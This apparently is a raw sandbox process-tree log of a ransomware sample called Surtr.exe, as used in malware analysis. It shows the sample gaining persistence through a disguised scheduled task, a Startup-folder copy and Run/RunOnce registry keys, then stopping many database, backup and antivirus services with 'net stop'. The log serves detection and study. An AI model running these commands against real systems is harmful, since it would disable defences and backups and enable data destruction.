        
        PID:532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    PID:240
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
    3⤵
    PID:1964
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper100"
      4⤵
      PID:604
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
        5⤵
        
        PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
    3⤵
    PID:2200
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerOLAPService"
      4⤵
      PID:1364
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
        5⤵
        
        PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL80"
    3⤵
    PID:1184
  - - C:\Windows\system32\net.exe
      net stop "MySQL80"
      4⤵
      PID:2284
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL80"
        5⤵
        
        PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
    3⤵
    - Drops startup file
    PID:1976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:2416
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL57"
    3⤵
    PID:1936
  - - C:\Windows\system32\net.exe
      net stop "MySQL57"
      4⤵
      PID:1756
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL57"
        5⤵
        
        PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:580
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
    3⤵
    PID:2332
  - - C:\Windows\system32\net.exe
      net stop "OracleClientCache80"
      4⤵
      PID:692
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "OracleClientCache80"
        5⤵
        
        PID:2484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:2736
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
    3⤵
    PID:800
  - - C:\Windows\system32\net.exe
      net stop "PDVFSService"
      4⤵
      PID:1108
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "PDVFSService"
        5⤵
        
        PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:2520
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
    3⤵
    PID:2468
  - - C:\Windows\system32\net.exe
      net stop "POP3Svc"
      4⤵
      PID:1568
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "POP3Svc"
        5⤵
        
        PID:1704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer"
    3⤵
    PID:1748
  - - C:\Windows\system32\net.exe
      net stop "ReportServer"
      4⤵
      PID:2248
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer"
        5⤵
        
        PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
    3⤵
    PID:2180
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SQL_2008"
      4⤵
      PID:2616
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
        5⤵
        
        PID:432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:2716
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:2128
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
        5⤵
        
        PID:2680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
    3⤵
    PID:2476
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPS"
      4⤵
      PID:2328
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPS"
        5⤵
        
        PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
    3⤵
    PID:2868
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPSAMA"
      4⤵
      PID:892
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
        5⤵
        
        PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "RESvc"
    3⤵
    PID:2816
  - - C:\Windows\system32\net.exe
      net stop "RESvc"
      4⤵
      PID:1940
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "RESvc"
        5⤵
        
        PID:1352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sacsvr"
    3⤵
    PID:1812
  - - C:\Windows\system32\net.exe
      net stop "sacsvr"
      4⤵
      PID:2608
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sacsvr"
        5⤵
        
        PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SamSs"
    3⤵
    PID:624
  - - C:\Windows\system32\net.exe
      net stop "SamSs"
      4⤵
      PID:1616
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SamSs"
        5⤵
        
        PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
    3⤵
    PID:1956
  - - C:\Windows\system32\net.exe
      net stop "SAVAdminService"
      4⤵
      PID:1924
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVAdminService"
        5⤵
        
        PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVService"
    3⤵
    PID:1196
  - - C:\Windows\system32\net.exe
      net stop "SAVService"
      4⤵
      PID:1916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Smcinst"
    3⤵
    PID:1952
  - - C:\Windows\system32\net.exe
      net stop "Smcinst"
      4⤵
      PID:3056
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Smcinst"
        5⤵
        
        PID:2536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROD"
      4⤵
      PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SmcService"
    3⤵
    PID:2372
  - - C:\Windows\system32\net.exe
      net stop "SmcService"
      4⤵
      PID:3016
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SmcService"
        5⤵
        
        PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
    3⤵
    PID:956
  - - C:\Windows\system32\net.exe
      net stop "SMTPSvc"
      4⤵
      PID:1168
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SMTPSvc"
        5⤵
        
        PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SNAC"
    3⤵
    PID:228
  - - C:\Windows\system32\net.exe
      net stop "SNAC"
      4⤵
      PID:236
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SNAC"
        5⤵
        
        PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SntpService"
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sophossps"
    3⤵
    PID:1648
  - - C:\Windows\system32\net.exe
      net stop "sophossps"
      4⤵
      PID:1512
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sophossps"
        5⤵
        
        PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
    3⤵
    PID:2664
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$ECWDB2"
      4⤵
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:1072
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:2732
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
        5⤵
        
        PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:2264
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEMGT"
      4⤵
      PID:2092
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"
        5⤵
        
        PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:1008
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:1188
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
        5⤵
        
        PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:1752
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SBSMONITORING"
      4⤵
      PID:3044
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
        5⤵
        
        PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
    3⤵
    PID:1804
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SHAREPOINT"
      4⤵
      PID:1160
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
        5⤵
        
        PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
    3⤵
    PID:2572
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SQL_2008"
      4⤵
      PID:588
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
        5⤵
        
        PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:2428
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:2440
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
        5⤵
        
        PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
    3⤵
    PID:2080
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPS"
      4⤵
      PID:2556
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPS"
        5⤵
        
        PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
    3⤵
    PID:2184
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$TPSAMA"
      4⤵
      PID:1740
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
        5⤵
        
        PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:1164
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:2620
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:2696
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:1052
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
        5⤵
        
        PID:2204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
    3⤵
    PID:2376
  - - C:\Windows\system32\net.exe
      net stop "SQLBrowser"
      4⤵
      PID:2636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLBrowser"
        5⤵
        
        PID:3028
    - - C:\Windows\system32\net.exe
        
        net stop "vmicvmsession"
        5⤵
        
        PID:2376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvmsession"
      4⤵
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
    3⤵
    PID:2964
  - - C:\Windows\system32\net.exe
      net stop "SQLSafeOLRService"
      4⤵
      PID:1320
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSafeOLRService"
        5⤵
        
        PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
    3⤵
    PID:3068
  - - C:\Windows\system32\net.exe
      net stop "SQLSERVERAGENT"
      4⤵
      PID:2412
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        5⤵
        
        PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
    3⤵
    PID:1784
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY"
      4⤵
      PID:2504
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY"
        5⤵
        
        PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:2956
  - - C:\Windows\system32\net.exe
      net stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:2256
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
        5⤵
        
        PID:2684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
    3⤵
    PID:2060
  - - C:\Windows\system32\net.exe
      net stop "SQLWriter"
      4⤵
      PID:2496
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLWriter"
        5⤵
        
        PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
    3⤵
    PID:1660
  - - C:\Windows\system32\net.exe
      net stop "SstpSvc"
      4⤵
      PID:2156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
    3⤵
    PID:2112
  - - C:\Windows\system32\net.exe
      net stop "svcGenericHost"
      4⤵
      PID:2492
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "svcGenericHost"
        5⤵
        
        PID:792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "tmlisten"
    3⤵
    PID:2400
  - - C:\Windows\system32\net.exe
      net stop "tmlisten"
      4⤵
      PID:2792
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "tmlisten"
        5⤵
        
        PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "TrueKey"
    3⤵
    PID:1100
  - - C:\Windows\system32\net.exe
      net stop "TrueKey"
      4⤵
      PID:2960
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "TrueKey"
        5⤵
        
        PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
    3⤵
    PID:2804
  - - C:\Windows\system32\net.exe
      net stop "UI0Detect"
      4⤵
      PID:1844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
    3⤵
    PID:1540
  - - C:\Windows\system32\net.exe
      net stop "VeeamBackupSvc"
      4⤵
      PID:1884
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBackupSvc"
        5⤵
        
        PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
    3⤵
    PID:3036
  - - C:\Windows\system32\net.exe
      net stop "VeeamBrokerSvc"
      4⤵
      PID:2552
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamBrokerSvc"
        5⤵
        
        PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
    3⤵
    PID:532
  - - C:\Windows\system32\net.exe
      net stop "VeeamCatalogSvc"
      4⤵
      PID:2932
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCatalogSvc"
        5⤵
        
        PID:576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
    3⤵
    PID:2752
  - - C:\Windows\system32\net.exe
      net stop "VeeamCloudSvc"
      4⤵
      PID:604
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamCloudSvc"
        5⤵
        
        PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
    3⤵
    PID:2272
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploymentService"
      4⤵
      PID:1364
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploymentService"
        5⤵
        
        PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
    3⤵
    PID:468
  - - C:\Windows\system32\net.exe
      net stop "VeeamDeploySvc"
      4⤵
      PID:2140
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamDeploySvc"
        5⤵
        
        PID:1208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:1672
  - - C:\Windows\system32\net.exe
      net stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:3012
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
        5⤵
        
        PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
    3⤵
    PID:1732
  - - C:\Windows\system32\net.exe
      net stop "VeeamMountSvc"
      4⤵
      PID:2420
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamMountSvc"
        5⤵
        
        PID:2812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
    3⤵
    PID:1464
  - - C:\Windows\system32\net.exe
      net stop "VeeamNFSSvc"
      4⤵
      PID:1484
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamNFSSvc"
        5⤵
        
        PID:1772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
    3⤵
    PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
    3⤵
    PID:2512
  - - C:\Windows\system32\net.exe
      net stop "VeeamTransportSvc"
      4⤵
      PID:2308
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamTransportSvc"
        5⤵
        
        PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "W3Svc"
    3⤵
    PID:2516
  - - C:\Windows\system32\net.exe
      net stop "W3Svc"
      4⤵
      PID:3060
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "W3Svc"
        5⤵
        
        PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "wbengine"
    3⤵
    PID:2872
  - - C:\Windows\system32\net.exe
      net stop "wbengine"
      4⤵
      PID:1736
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wbengine"
        5⤵
        
        PID:364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "WRSVC"
    3⤵
    PID:992
  - - C:\Windows\system32\net.exe
      net stop "WRSVC"
      4⤵
      PID:1096
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WRSVC"
        5⤵
        
        PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:2452
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:544
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
        5⤵
        
        PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:2144
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:2076
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
        5⤵
        
        PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
    3⤵
    PID:2356
  - - C:\Windows\system32\net.exe
      net stop "VeeamHvIntegrationSvc"
      4⤵
      PID:2928
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
        5⤵
        
        PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "swi_update"
    3⤵
    PID:2564
  - - C:\Windows\system32\net.exe
      net stop "swi_update"
      4⤵
      PID:2304
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "swi_update"
        5⤵
        
        PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
    3⤵
    PID:2068
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CXDB"
      4⤵
      PID:2472
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CXDB"
        5⤵
        
        PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
    3⤵
    PID:2444
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$CITRIX_METAFRAME"
      4⤵
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
    3⤵
    PID:2608
  - - C:\Windows\system32\net.exe
      net stop "SQL Backups"
      4⤵
      PID:1812
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQL Backups"
        5⤵
        
        PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
    3⤵
    PID:1616
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$PROD"
      4⤵
      PID:624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$PROD"
        5⤵
        
        PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
    3⤵
    PID:1924
  - - C:\Windows\system32\net.exe
      net stop "Zoolz 2 Service"
      4⤵
      PID:1956
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Zoolz 2 Service"
        5⤵
        
        PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
    3⤵
    PID:1916
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper"
      4⤵
      PID:1196
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper"
        5⤵
        
        PID:2536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
    3⤵
    PID:3056
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROD"
      4⤵
      PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
    3⤵
    PID:3016
  - - C:\Windows\system32\net.exe
      net stop "msftesql$PROD"
      4⤵
      PID:2372
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "msftesql$PROD"
        5⤵
        
        PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
    3⤵
    PID:1168
  - - C:\Windows\system32\net.exe
      net stop "NetMsmqActivator"
      4⤵
      PID:956
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "NetMsmqActivator"
        5⤵
        
        PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
    3⤵
    PID:236
  - - C:\Windows\system32\net.exe
      net stop "EhttpSrv"
      4⤵
      PID:228
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EhttpSrv"
        5⤵
        
        PID:1796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ekrn"
    3⤵
    PID:204
  - - C:\Windows\system32\net.exe
      net stop "ekrn"
      4⤵
      PID:224
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ekrn"
        5⤵
        
        PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
    3⤵
    PID:1512
  - - C:\Windows\system32\net.exe
      net stop "ESHASRV"
      4⤵
      PID:1648
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ESHASRV"
        5⤵
        
        PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
    3⤵
    PID:764
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$SOPHOS"
      4⤵
      PID:1088
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
        5⤵
        
        PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
    3⤵
    PID:1712
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$SOPHOS"
